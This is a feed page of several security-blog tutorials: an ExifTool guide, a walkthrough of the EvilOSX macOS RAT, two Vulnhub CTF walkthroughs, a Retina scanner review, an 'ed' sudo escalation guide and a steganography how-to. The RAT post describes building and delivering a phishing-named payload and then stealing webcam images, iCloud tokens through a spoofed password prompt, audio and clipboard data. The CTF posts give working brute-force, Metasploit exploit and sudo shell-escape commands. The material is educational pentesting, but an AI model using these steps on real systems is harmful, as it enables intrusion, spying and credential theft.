Loading...

Follow Hacking Articles on Feedspot

Continue with Google
Continue with Facebook
or

Valid

In this article, we’ll discover various methods to read, write and manipulate the meta-data information recorded in a variety of file types. In order to achieve this, we’ll be using a tool known as “ExifTool”.  EXIF is an acronym for Exchangeable Image File Format and it is a standard for the inclusion of metadata in certain file types.

Table of Content
  • Introduction to ExifTool
  • Installation
  • Usage of ExifTool
    • Extract the Common Meta-Data Information
    • Extract the Specific Meta-Data Information
    • Extract GPS Co-ordinates
    • Extract Thumbnail Image
    • Extract metadata using specific keywords
  • ExifTool’s Verbose Mode
  • Writing the Meta-Data Information
  • Removing Meta-Data Information
  • Saving outputs
    • In HTML file
    • In-Text File
  • Extracting EXIF data from a Video file
Introduction

ExifTool is developed by Phil Harvey. It is a platform-independent Perl library coupled with a full-featured command-line implementation for reading, writing and manipulating the metadata across a broad range of files, particularly the JPEG images. This metadata may comprise a bunch of information such as the camera make, file type, permissions, file size etc., though it further offers more details about the photograph, like the exposure, the shutter speed and whether the flash fired or not. ExifTool probably gives us the simplest way to extract metadata from files, as it is free and an open-source program.

Installation

Exiftool is quite easy to deploy. It’s just about hitting our Linux terminal and cloning the tool from GitHub.

git clone https://github.com/exiftool/exiftool.git

In addition, we need to install the necessary package for it.

sudo apt-get install libimage-exiftool-perl

So, we’ve mounted the tool in our system. Let’s take a closer look at it.                                                

Usage of Exiftool

To extract the entire metadata of a file, we just need to execute the given below command:

exiftool  <filename>

From the below image, you can now notice that we’ve got all the information drawn from our image file from the very basic to advance.

However, if we need to capture the ids along with exif tags in the Hexa-Decimal format, though we need to run the following command:

exiftool -H <filename>

From the below image, we can see that there is a lot of information stored within these Exif tags.

Extract the Common Meta-Data Information

Now execute the given below command which will provide us with the output of the most common Exif tags of the image file.

exiftool  –common <filename.jpg>

Extract the Specific Meta-Data Information

We can list a particular meta-information of our image file by simply executing the command given:

exiftool  -tagname  -tagname  <filename>

From the below image, we get our desired output displayed along with their respected tag names in a list type format.

Extract GPS Co-ordinates

The photographs we capture using our smartphones or camera have GPS coordinates embedded as metadata in the image files. To obtain this, we just need to fire the command given below:

exiftool  <filename> | grep GPS

Here we got the GPS Position, now just copy and paste this complete coordinate information over Google Maps and we will get the exact location of the camera when the picture was taken.

Extract Thumbnail Image

Thumbnails are the original preview images basically compressed. These are just created to open the original images more quickly and act as place holders to them. In order to extract these thumbnail images, we just need to execute the following command:

exiftool  -ThumbnailImage (filename) > (Output filename)

Here we can see that the thumbnail.jpg file is extracted from the test.jpg image.

Extract metadata using specific keywords

The following command will assist us to extract the metadata information associated with some specific keywords.

exiftool  "-*keyword*" <filename>

From the below picture, we can see that our fired command displays all tags with names containing the word “Image” from the file.

ExifTool’s Verbose Mode

Verbose mode generates extended information i.e. when we add [-v] to the exiftool command it will display us the comprehensive data about the process that it is performing.

exiftool  -v <filename>

Writing the Meta-Data

ExifTool provides us with a great power to write most of the information on the EXIF tags, that anyone might want to alter, but some tags are protected because they describe the image’s physical characteristics that we can’t change with ExifTool, such as compression.  Also, other tags like the GPS, the MakerNotes, this information can be edited.

To manipulate the exif data we need to execute the following command:

exiftool  -Make= “HackingArticles”  <filename>

Here we can see that the information stored in the “Make” tag is replaced from “OPPO” to “HackingArticles”. While writing the information, ExifTool’s script automatically preserves the original file by adding “_original” to the end of the file name.

Removing Meta-Data Information

We have only extracted or manipulated the EXIF data so far, but what if we want to remove or delete all the metadata from an image file. Just execute the following below command, let’s see how this works:

exiftool  -all=  <filename>

It shows 1 image files uploaded. The “test.jpg” EXIF data has been removed effectively. Although let’s attempt to extract the metadata from “test.jpg” again, hence we’re just getting the basic information of the image and the rest is deleted.

Saving outputs in Multiple Format
  1. In HTML file

We will save the ExifTool’s output in an HTML file in order to maintain the records and for better readability. To do this we will use the parameter “-h” along with the exiftool’s command and save the results in a file with .html extension.

exiftool  -h (filename) > (output.html)

Here, we can see test.html file is generated. Although we just need to open it to check our EXIF data output in any of our browsers.

  1. In-Text File

We can even export our exifdata to a text file similar to the output of the HTML. To achieve this, we simply need to execute the following commands:

exiftool (filename) > (outputexif.txt)

Further, we can also monitor our output either by opening it in any of the text editors or by simply running the command: 

cat <filename>

Extracting ExifData from a Video file

ExifTool not only extract metadata from the jpg file format but can also read and write in a variety of files. To know more click here.

We will now extract the entire meta-data information from an mp4 video file. To extract this, we will run the basic exiftool’s command i.e.

exiftool <filename.mp4>

Conclusion

This was Exiftool’s complete usability guide as a meta-data extractor. It is user-friendly and convenient because of its simple command-line implementation. It has thus become one of the best tools to extract meta-data data from a variety of file formats.

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post ExifTool : A Meta-Data Extractor appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Hacking Articles by Raj Chandel - 15h ago

In this article, we will learn to use EvilOSX tool which is a Remote Administrator tool (RAT ) for initializing foothold on MacOS/OSX like platform. It can dramatically increase access in a matter of seconds.

Table of Content
  • Introduction
  • Installation
  • Usage in Exploitation
  • Usage in Post-Exploitation
    • System Info
    • Webcam
    • Retrieve iCloud auth tokens
    • Microphone
    • Clipboard
  • Conclusion
Introduction

EvilOSX is an evil RAT (Remote Administrator Tool) designed to work upon macOS / OSX Platforms. It was developed by Marten4n6. Its backbone is famous Empire Framework Project. This project can be modified to be used on Rubber Ducky. This toolkit is fully packed with features. It was designed on the module system that made the debugging, improvements and addition of other modules easy. Also being developed in python it provides easy to be run across different attacking platforms.

Installation

The installation of the EvilOSX RAT on the Attacker machine, which in our case in Kali Linux is pretty simple. To begin with, we will visit the EvilOSX GitHub Page. After getting the git link, we are going to clone the EvilOSX to our attacker machine using the git clone command.

git clone https://github.com/Marten4n6/EvilOSX.git

After cloning the EvilOSX, we traversed in the newly created directory created with the name of EvilOSX. Now, the tool has some predefined requirements that are required in order to make the tool function properly. Being a python developed tool, we will use the “pip” to install those requirements. These requirements are given by the author in the form of a text file which we used to install them.

pip install -r requirements.txt

Usage in Exploitation

Since we have successfully installed all the predefined requirements, it time to run this tool and gain control over some macOS devices. Now to exploit, we need a payload. To create this payload, we will use the start.py file with the builder parameter.

python start.py --builder

After running the script, it asked us to enter the following information:

  • the Server host, here we entered our Attacker Machine IP Address (Kali Linux).
  • Next, it asked us for a port, this can be any random port.
  • After this, we are asked for the location of the payload.
  • Next, we have to choose if we want EvilOSX to work upon the rubber ducky or not. Enter 0 for otherwise.
  • Furthermore, we are asked to choose the loader, leave it default.
  • After that, we are asked to name the payload so as phish the user.

After all these choices, a launcher is created as shown in the image given below.

Now we can use any method to share this launcher or payload to the victim. In our case, we used a python HTTP server to get this file to the victim system. This file is downloaded on the victim system and then after providing the proper permissions the payload is executed as shown in the image given below.

chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py

While we are executing the Launcher on the victim, we have to perform some actions on the attacker machine simultaneously. We are going execute the start.py again but this time in the CLI mode. Here we have to specify the port that we used while creating the launcher as the parameter as shown in the image.

python start.py -cli --port 4545

Post-Exploitation

After running the start.py script in the previous steps simultaneously with the launcher on the victim machine, we have successfully infiltrated the Victim MacOS system. The terminal converts in a framework as shown in the image. We can configure a page to shown upon the running. Type in help to show a list of working commands. We can see the list of active bots by using the command bots. To establish a connection to a bot, use connect command followed by the number which in this case is 0. To see the list of available modules we use modules command.

To use a module, just type in “use” followed by the module name. As there are a bunch of available modules, we are demonstrating a bunch of them here for reference. You can try them all at your convenience.

System Info

To get a brief summary of the system, we can use the get info module. This gives us the System Version, Model of the MacOS device. We also get the Battery status in case it is a Laptop. We have the name of the Wi-Fi network it is connected to. It also tells us the privileges the current account has as well as the status of the FileVault.

Webcam

Now, we will try to grab a snap from the webcam of the MacOS device. To do this we will need to use the webcam module. It gives us a warning that there a green LED will show near the camera.

We have successfully captured a snap from the victim’s webcam as shown in the given image.

Retrieve iCloud auth tokens

We can extract the iCloud Authentication that contains information related to the AppleID linked to the device. However, this will first show a prompt on the victim system.

After agreeing to continue, a prompt will pop us as shown in the image given below. This is masquerading as a genuine prompt that will spoof the victim and make him enter the password.

After the victim enters a password, we will successfully capture the mail ID liked to the device as well as the access tokens as shown in the image given below.

Microphone

We can also capture the audio from the victim device using the microphone module. After running the command use microphone, we are asked to enter the time in seconds to record the audio from the microphone of the victim device and also the name of the service that would show up in the verification prompt.  

Here we entered 5 seconds, and we left the name of service to be blanked which made the RAT to take it as random string as shown in the given image. A permission prompt pops up on the victim system asking for permission to access the microphone.

After allowing we have the recorded audio in the mp3 format saved on out attacker machine in the tmp directory.

Clipboard

We can also sniff the clipboard data from the victim machine. To do this we will have to use the clipboard. This will start the sniffer on the victim machine for the specified time in seconds. After starting the sniffer, any text that the victim will copy can be viewed as shown in the image given below.

Conclusion

 EvilOSX has a lot of uses, and the attention to detail in automating certain exploits makes it a great dedicated tool for OSX. The ease with which it works and attacks is remarkable, we can launch a phishing attack to escalate privileges or trick a user into letting us deeper into the system. It’s a great tool and amazing to use as it traverses itself to connect apple devices.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post EvilOSX-RAT for MacOS/OSX appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Today we are going to take another CTF challenge from the series of Symfonos. The credit for making this VM machine goes to “Zayotic” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:
  1. Scanning
  • NMAP
  1. Enumeration
  • Enum4Linux
  1. Exploitation
  • Smbclient
  • Hydra
  • Msfconsole
  1. Privilege Escalation
  • Exploiting Sudo rights
Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.102 automatically from our local wifi network.

Then we used Nmap for port enumeration. We found that port 21,22, 80,139 and 445 are open.

nmap –A 192.168.1.102

Enumeration:

As port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage. We also tried dirb and other directory brute-forcing tools but couldn’t find anything.

For further enumeration, we used Enum4Linux tool and found some useful information. We found a shared directory named anonymous.

To confirm our finding we took the help of smbclient with an empty password to list the shared resources of the target machine and got the same result.

Inside the anonymous directory, there is another directory named backups. Inside the backups directory, we got a log.txt file. So we downloaded the same file with get command.

smbclient –L 192.168.1.102
smbclient //192.168.1.102/anonymous
ls
cd backups
get log.txt

After opening the log.txt file in our local machine we got a username aeolus.

Exploitation:

So far we have got a username aeolus, so we tried to bruteforce it with hydra and after a long wait we successfully got a password sergiotaemo.

hydra –l aeolus –P /usr/share/worlists/rockyou.txt 192.168.1.102 ssh

Now we have a username and a password and we already know that there ssh service running on the target machine. We tried to ssh login the target using msfconsole and were successfully able to do so.

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.102
set username aeolus
set password sergiotaemo
exploit

From the ifconfig command, we got a little hint that the target machine is listening on the localhost IP only.

So we used netstat command to check for the IP address and ports the target machine is listening on and found that web service (8080) is allowed for localhost only.

So what we did is we used port forwarding to access the port 8080 of the target.

netstat
portfwd add -l 1234 –p 8080 –r 127.0.0.1

After that, we were able to access the web service running on port 8080. On the webpage, we found it is running a LibreNMS web application.

We searched for any exploit available for the LibreNMS application in Metasploit and found one command injection exploit available.

Using this exploit we were able to get a meterpreter session of the user LibreNMS.

use exploit/linux/http/libre_addhost_cmd_inject
set rhosts 127.0.0.1
set rport 1234
set lhost 192.168.1.103
set username aeolus
set password sergiotaemo
exploit

Privilege Escalation:

To get to the root shell we checked for the sudoer permissions for the librenms user and found that this user can run mysql command with no password. So we leveraged this to our advantage and run /bin/sh to get the root shell.

Once we got the root shell we traversed to the root directory and opened the proof.txt file to complete the challenge.

sudo –l
sudo mysql -e '\! /bin/sh'
id
cd /root
cat proof.txt

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The post Symfonos:2 Vulnhub Walkthrough appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

In this article, we will learn how to use retina, “a vulnerability scanner” to our best of advantage. There are various network vulnerability scanners, but Retina is the industry’s most powerful and effective vulnerability scanners. This network vulnerability scanning tool gives vulnerability assessment experience and generates full brief network vulnerability report.

Table of content
  • Introduction to Retina
  • Scanning process
  • Working of Retina
  • Network scanning with retina
  • Conclusion
Introduction to Retina

Retina network scanner allows you to scan multiple platforms. It also provides you with automatic fixes and the ability to create your own audits. It works against all the critical vulnerabilities hence, allowing you to secure your network properly. As it keeps updating its database at the beginning of every session, it is pretty reliable. Retina permits you to scan parallelly by using its queuing system to scan up to 256 targets at the same time. You can also execute the majority of scans without administrative rights. It also allows you to perform custom audit scans to enhance your internal security policies. Retina Network Security Scanner is an outstanding solution designed to discover profile and assess all assets deployed on an organization’s network. With Retina Network Security Scanner, customers can efficiently identify, prioritize and remediate vulnerabilities such as missing patches and configuration weaknesses.

Scanning Process

For a scan to begin the specific details to the retina through its GUI. As soon as the scanner will receive the scanning details, it will begin the auditing process. An audit scan covers the following :

  • Targeting : builds a scan list from the address group and discovery options
  • Port scanning : finds out all the open, closed and filtered ports
  • Detecting OS : lets you know about the OS on the target system
  • Auditing : accesses vulnerabilities of each port and their respective services.
Working of Retina

First Retina recovers the list of IPs that need to be filtered then it builds and composes its target list to the eeye_ groups table. The worklist contains the work to begin and halt data. Retina at that point starts running the scan. Once targets are filtered, then the completed passages are evacuated from the line record. In case it’s powered down for any reason, this guarantees that a filter will total. At the conclusion of the check, the scanner composes Completed to the eeye_groups table within the filter comes about the database (RTD). Suppose the client prematurely ends the work, then the scanner composes Prematurely ended to that table.

Network scanning with Retina

We have downloaded the Retina Vulnerability Scanner from the Offical Site. After Downloading the correct version with respect to our machine, we have installed the scanner through the setup. It is a fairly simple setup to install. After installation, we will run the application which results us by providing 3 tabs, i.e. “Audit, Remediate and Report”. First, we will work upon the Audit tab, inside which we have selected “Single-use” after that we are scanning an individual target in Target Type. We will use the IP Address for the target. In the case of “Multiple-use”, we can use a specific IP range too.

After selecting the Target, we must select the port that we want to scan, we have multiple options like, all ports, Common Ports, Discovery Ports, and others. In our scenario, we have selected “All ports”.

After selecting the ports, it’s time to select the type of audit, which we want to perform on our target machine. This includes many types with an option to modify. We can craft a personalized audit with the help of options provided. We selected “All Audits”. This took more time in performing the scan, but the personalized scan will take less time.

Now, we got the Options. Here, we have a choice to select some additional functionality that we can include in our scan. This includes OS Detection, Reverse DNS, NetBIOS Name, MAC Address and others. We can also provide the number of users that we want to enumerate.

Now, we run the scanner, by clicking on the “Scan” button. After hitting the Scan button, the scan starts running and we can see the details of the Scan in Active tab of the Scan Job Section. Here we can see that name of the server “Metasploitable” and the Operating System is “Ubuntu 8.04”. We also can see other details of the scan.

Now we move on to the “Remediate Tab”, here in the Configuration Section we can see the Vulnerabilities that were found and we have the option to sort out the Vulnerabilities based on the Name, Category and other criteria. Also, in the case of multiple devices, we can generate report sorted by the individual IP address

Next, we will move towards the “Report Tab”.  In this, we can select more option to refine our report. This includes sections like Scan Summary, Vulnerabilities by Category, Top Vulnerabilities, Top Open Ports etc. Apart from this, we can also select the type of report that we want. In the below image I have chosen an “Executive Report”.

As you can see from below image we have gained with multiple choices to choose from the Report Type that listed us with many options such as: “Summary Report, Vulnerability Export Report, Access Report, Dashboard Report, etc.” This is one of the most vital features that give Retina an edge in the market of Vulnerability Scanners.

Here, in our practical, we have chosen the ‘Executive’ report type as it is the one which is most commonly used in the IT industry. You can see in the above image that, the report will cover all the major sections which are scan summary, top vulnerabilities, and open ports and all the important information that is required.

Once the report is generated, you can open it in the browser as shown in the image below. It will record the date and time of the scans and report for you too.

Everything in the report will be catalogued for your convenience and the title will be shown in the index as shown below. It will start by showing all the top vulnerabilities in all the way to the bottoms ones.

First in the report is “scan metrics” which gives a brief overview of the scan. This overview will inform you about how many vulnerabilities are exploitable and will also rate the vulnerabilities for you from low to high. It will also show you the time taken by the scan with the exact start and end time.

And further, it will categorise all the vulnerabilities with their basic information just as it’s shown in the image below:

Then it will show you the top 20 vulnerabilities with their name, rise and information along with their count.

Further, it will show you the bottom 20 vulnerabilities with their names and other information.

Then, as catalogued it will go on to showing you the top twenty open ports with their names, port number and service. It also includes count which helps to tell the total no. of ports that are running in the same service.

And then it tells you about the operating system on the target machine. Which is quite necessary information as it helps you to formulate attack or security policy.

Conclusion

Since the launch of Retina Vulnerability Scanner in 1998, the Beyond Trust Network states that it has sold over 10,000 copies of the Scanner. The Retina Vulnerability Scanner is one of the scanners that have an edge over other scanners as it continuously monitors and improves their scanner with the enterprise security posture. It is the most sophisticated vulnerability assessment solution on the market that is available as a standalone application, a host-based option, or as part of the Retina CS enterprise vulnerability management solution, Retina Network Security Scanner enables you to efficiently identify IT exposures and prioritize remediation enterprise-wide

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Retina: A Network Scanning Tool appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Here in this article, we are going to introduce a line-oriented text editor command i.e. “ed” which is used to generate, display, alter and operate text files. All ed commands operate on whole lines or ranges of lines; e.g., the “d” command deletes lines; the “m” command moves lines, “t” command copy the lines and so on, therefore, now we will check that how we can successfully execute our task of Privilege Escalation by accomplishing all these significant of “ed” command.

Table of Content

Overview to ed                               

  • Summary to ed
  • Primary Action attained using ed

Abusing ed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO
Summary to ed

ed command in Linux is used for initiation of the “ed text editor” which is a line-based text editor. Its minimal interface tendency makes it less complex for working on text files. It helps user to perform many operations like creating, editing, displaying and manipulating the files.

Editing is done in two distinct modes: “command and input”. In the “command” mode “ed” reads command from the standard input and execute to manipulate the contents of the editor buffer whereas when an input command, such as ‘m’ (move), ‘d’ (delete), ‘t’ (copy) or ‘c’ (change), is given, ed enters for its “input mode”.

It is the oldest editor which was developed in 1969 in the UNIX and is succeeded by vi and emacs text editor.

Now type its help command to know more about “ed”.

ed --help

Fundamental activities achieved by “ed”: As we know “ed” does many operations so now we will go through to its entire functionality one by one.

Initializing file with ed: At the initial phase, the terminal space will seem to be like as below image when the command is run . By default, the editor creates an empty buffer to write, similar to the way any other command-line based editor works when you invoke it without a file name.

ed

Now we will start to create a text file that contains some text within it. For doing so very first we will press ‘a’ before entering anything to the file and once we accomplished our task of writing we will enter a period (.) to signify this to the editor.

Note: The main thing that needs to remember is to use ‘a’ (initial) and ‘.’ (Final) as the ways to enter and exit the insert mode. Now, to save the buffer in a file, use ‘w’ followed by a file name of own choice which helps to save the file by the desired name as well as will also display the total no. of bytes that a file contains, and then ‘q’ to quit the editor.

ed
a
.
w info.txt
q
cat info.txt

For the confirmation of your created file i.e. whether it has been created or not you can recheck it by using “cat” command.

Edit the file with ed: Now, in case you need to edit the same file again, then it can simply be done by passing the name of the file as an argument to the ed command, and then following the same procedure as discussed above.

Here in the below image, I’m adding one more line to my file “info.txt” which I have created above by following the same process.

ed info.txt

Note Every time we need to use ‘a’, ‘.’, ‘w’, ‘q’ command whenever we use any option of ed command.

Change any specific line: Till now we have learnt basic editing using ed, now let’s move ahead to discuss more editing aspects by using ed. For example, if we want to make changes in a specific line then how we can attain that operation using ed.

Here in the below image, it has been shown how we can print any particular line using argument ‘p’ and ‘n’

When we type ‘p’ it gives us the current line at which the control is currently, while on using ‘n’ it gives us the line number as well.

ed info.txt
p

So after typing ‘n’ we simply need to mention that line no. for which we want alteration. By default ‘n’ displays the last line of the file so after that you can type the line no. as per your search.

n
2
5

Once you achieved the line where you want to make a change, then you can enter ‘c’ to change that line by typing the text again. For example, I have changed the 5th line which is the last line of my file, by adding some more detail to it. To recheck my modification I have read my file by using ‘cat’ command and will save the file by following the same process.

c
cat info.txt

Display error message by the use of ed: When you type something which ed can’t understand, it displays a question mark (?) by default. To know more about where you have mistaken ed provides a very helpful option i.e. ‘h’.

ed info.txt
b
h

As from below screenshot it can be clearly understood that when I have used ‘b’ option it gave me (?) which is the symbol of error and while typing ‘h’ ed has displayed the error message as an unknown command for option ‘b’.

Copy and move operation by ed: Apart from all above discussed function ed also gives the option for copy and paste a line at some other location, in this case, we use ’t’ command to copy the line and ‘m’ to move any line. You need to precede’t’ with the line number to which you want to copy and append the destination line number. For example, as in the below image, I have copied the 5th line to position 0 and will save changes.

ed info.txt
5t0
cat info.txt

In above-mentioned command 5 is representing to the line which needs to copy and 0 is representing to the line no. for where it needs to be copied.

Note: One can also use’ instead of ‘t’ if he/she wants to move the line to another place.

Search operation using ed: Searching for any line by its keyword can be easily done by ed.  For doing so first we will use “-p%” followed by ed which will prompt you further for your search mission. After that to search forward, enter/followed by the search keyword. The moment at which you press enter, the editor will display the first line (containing the keyword) it encounters. You can run that command again to continue searching.

ed -p% info.txt
%/misconfiguration
%/Linux

Here in below image ed has printed only those line as output which consists search keywords i.e. misconfiguration and Linux.

Exploiting ed Sudo Rights Lab setups for Privilege Escalation

Now we will start to perform privilege escalation for “ed”. For doing so we need to set up our lab of ed command with administrative rights. After that, we will check for the “ed command” that what effect it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root.

To add sudo right open /sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /bin/ed

Exploiting Sudo rights

Now we will start exploiting ed service by taking the privilege of sudoer’s permission. For this, we need sessions of the victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.31

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the ed command as “root” without a password.

sudo -l

Now after knowing the fact that test user attains sudo rights so, taking this benefit here we can use ed command to access empty buffer to call bash/sh shell, with higher privileges if permitted on sudo.

Conclusion: Hence we have efficaciously exploited “ed” by attaining its functionality after granting higher privilege.  

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Linux for Pentester: ed Privilege Escalation appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

In this post, we will introduce the multiple ways for hiding any text that are based on Audio, Image, Video and White text. For achieving this we will use a method that is known as “Steganography”. The term steganography refers to the technique of hiding secret data within an ordinary, non-secret, file or message in order to avoid detection. So here we will check all those methods that can help us for doing the same.

Table of Content

Introduction

Purpose of steganography

Methods of steganography

  • Audio-based steganography
  • Image-based steganography
  • Video-based steganography
  • White text Steganography
Introduction

Steganography is the practice of hiding a file, message, image or video in another file like message video or audio. In general, the hidden message seems like something else like pictures, articles and sometimes shopping list. While the practice of encryption is to protect the content of a message alone, the style of steganography both concerns the disclosure and content of a secret message. Steganography covers data concealed in computer files. So, let’s understand this in a better way with the examples. First, let’s understand what is the purpose of steganography.

Purpose of Steganography

Effective communication is steganography. At first, you can encrypt and hide a private file inside a picture of another file type before sending it to somebody else. The likelihood of being intercepted will reduce. If you send any encrypted file to someone the other person will try to decrypt it in many ways and possibly, he will be able to do so. But in this case, it will reflect like a normal image and the other person will have no hint that what can be there on the other side of the picture. So, it is always a better and safe way of communication for those organisations where they want to protect their selves from these kinds of attacks.

So, let’s start and see how it works.

Audio Steganography

First, we will install a software named deep sound which is meant to convert all our audio files to some other format files. For installation please visit the link given below

https://deepsound.en.uptodown.com/windows

Conceal Approach: Now open the application and click on open carrier files and select an mp3 file behind which you want to conceal the original file.

Here we have selected an audio file behind which we will hide the data as we have done.

After selecting the file, we will now click on add secret file and give any file here which we want to conceal. Here we have opted for a document file.

Here you can further add one more extra security layer which is encoding by putting a password to the file. As you can see that we have given 123 as a password without which it won’t be possible for the other person to open the file.

The file is created successfully.

Now we can share this mp3 file with the other person to continue the hidden communication in the network.

Reveal Approach: The person also needs to open this with the same password which we had given for encoding. As the other person enters the password, he will be able to see the concealed content of the file by clicking on extract files.

As the other person enters the password, he will be able to see the concealed content of the file by clicking on extract files and the doc file is extracted successfully. So, by this tool, we have successfully concealed our doc file behind the mp3 file.

Image Steganography

Let’s now hide some text file behind an image file. So, we have installed the next tool which is OpenStego.

Conceal Approach:  we will first select the doc file which we want to hide after that we will add the image file behind which we will conceal the doc file and then we will choose a password and the concealed file is created.

Reveal Approach: Now we will extract the doc file by adding the image and then giving the right password and we have extracted the doc file.

Video Steganography

Now let’s see how we can hide anything behind a Video file. For this, we will install the tool Our secret from the link given here.

https://oursecret.soft112.com/

Once it is downloaded successfully. We will now be trying to conceal a doc file behind a video file.

Let’s start.

Hide: So first we will select a video which went to send. So, by clicking on select a carrier file we will choose our video and then that file which we want to hide and then giving it a password and click on hide and our new file is created.

Unhide: Now we will try to open this file with the same tool for unhiding and it will ask for the password. Once you will enter the password, we will get the concealed file here.

Text Steganography

Now we are moving towards a new idea of steganography which is white space steganography. In this kind of steganography, we will hide text behind the text which will be not possible for anyone to judge. For this, we will visit a website

www.spammimimc.com

Conceal Approach: Here we will click on encode and add the text which you want to hide and click on encode.

As you clicked on encode you will see that a new text encoded file is created.

Reveal Approach: To decode this encoded text, we will copy this text and paste it in the box given and click on decode.

And finally, you will get the message which was hidden behind that.

Another Method

Conceal Approach: That’s not all! We can also send this message as an excel file which is hard to detect for anyone. To use this feature, we will click on “encode as a spreadsheet” and enter the text which you want to conceal and click on encode.

Then this generates a new excel file to conceal our “secret message” behind its record.

When we open this excel file it seems a very normal excel file by which no one will get to know the real message behind that.

Reveal: But as we know that there is a hidden file behind this so we will decode this. So first click on decode fake spreadsheet.

Now paste the sheet which we want to decode in the column and click on decode.

Now you will get the real hidden message which was there behind this excel file as we got successfully.

So, it’s very clear that there are several ways of sending safe secret messages by the art of steganography.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information SecurityContact here

The post Steganography: The Art of Concealing appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Today we are going to take another CTF challenge from the series of Matrix. The credit for making this VM machine goes to “Ajay Verma” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge.

You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:
  1. Scanning
  • Netdiscover
  • NMAP
  1. Enumeration
  • Web Directory Search 
  1. Exploitation
  • Ghidra
  • SSH
  1. Privilege Escalation
  • Exploiting Sudo rights
Walkthrough: Scanning:

Let’s start of by scanning the network and identifying the host IP address. We can identify our host IP as 192.168.1.104 by using Netdiscover.

Then we used Nmap for port enumeration. We found that port 80 is open, SSH is running on port 6464 and port 7331 is open on the target machine.

nmap –p- –A 192.168.1.104

Enumeration:

As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.

So we used dirb for directory enumeration.

dirb http://192.168.1.104

After brute-forcing with dirb, we found a directory named /assets

We opened the assets directory in the browser and found an image file named Matrix_can-show-you-the-door.png under /assets/img/ URL.

We first opened this image but didn’t find anything of our use. Then upon looking at the file name properly we found out that the name of the file is itself giving us the path forward.

So we used Matrix in the URL as shown in the image below and it worked for us.

From the contents of the directory Matrix, we understood that we have to make a right combination of the alphanumeric to go ahead.

So after trying multiple combinations we used our little brain more aggressively and made a combination of n/e/o/6/4,  neo is the name of the actor in the Matrix movie and 64 number is I guess favourite number of the creator of this VM because he is using it everywhere.

We downloaded the file secret.gz and found that it’s actually a txt file and is containing the username and password.

file secret.gz
cat secret.gz

Upon cracking the hashed password using online tool hashkiller, we found the password as passwd.

If you remember from the nmap scan we have a port 7331 open and it was protected with Basic Authentication.

So we tried to open the URL http://192.168.1.104:7331  and were prompted for authentication, so we used admin:passwd as username and password and were able to login successfully.

But we couldn’t find anything useful there, so we used dirb with an already obtained username and password for directory bruteforcing.

After bruteforcing, we found a directory named data.

dirb http://192.168.1.104:7331 / -u admin:passwd

In the data directory, we found a file name data which came out to be a DOS file.

Exploitation:

We took the help of our best friend in need Google to know how to open a DOS file. And after some research, we found a tool named Ghidra for opening a DOS file.

After opening the data file with Ghidra tool we found a username and password guest:7R1n17yN30

As we already know from our nmap scan that there is SSH running on port 6464 on the target machine, so we tried to ssh the target machine with the above-found username and password and were successfully able to login.

ssh guest@192.168.1.104 –p 6464
id

But we were provided with the restricted bash (rbash) shell, so we used –t option to run ssh with noprofile extension and we got a complete shell of the guest user.

Checking the sudo permissions for the guest user we came to know that this user can run /bin/cp with permissions of another user trinity.

ssh guest@192.168.1.104 –p6464 –t "bash --noprofile"
sudo -l

Privilege Escalation

To elevate to a more privilege’s user, what we did is we created a new ssh key pair, gave read write execute permissions to id_rsa.pub file so that we would be able to copy it to our target location.

ssh-keygen
cd .ssh
chmod 777 id_rsa.pub

And then we took the advantage of sudo permission to copy the id_rsa.pub file in the /home/trinity/.ssh/authorized_keys folder. Now we can access ssh of the target machine with trinity user using the id_rsa key.

Checking the sudo permission for trinity it can execute oracle file with root permissions.

cp id_rsa.pub /home/guest
cd ..
sudo –u trinity /bin/cp/ ./id_rsa.pub /home/trinity/.ssh/authorized_keys
ssh trinity@127.0.0.1 –i /.ssh/id_rsa –p 6464
sudo -l

But there was no file with the name oracle in the /home/trinity directory, so we created an oracle file with /bin/sh in it using the echo command. In the end, we executed the oracle file with sudo command, we got the root shell.

 And once you have the root shell you can easily get the flag.

echo "/bin/sh" > oracle
chmod 777 oracle
sudo ./oracle
id
ls
cat flag.txt

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The post Matrix-3: Vulnhub Walkthrough appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
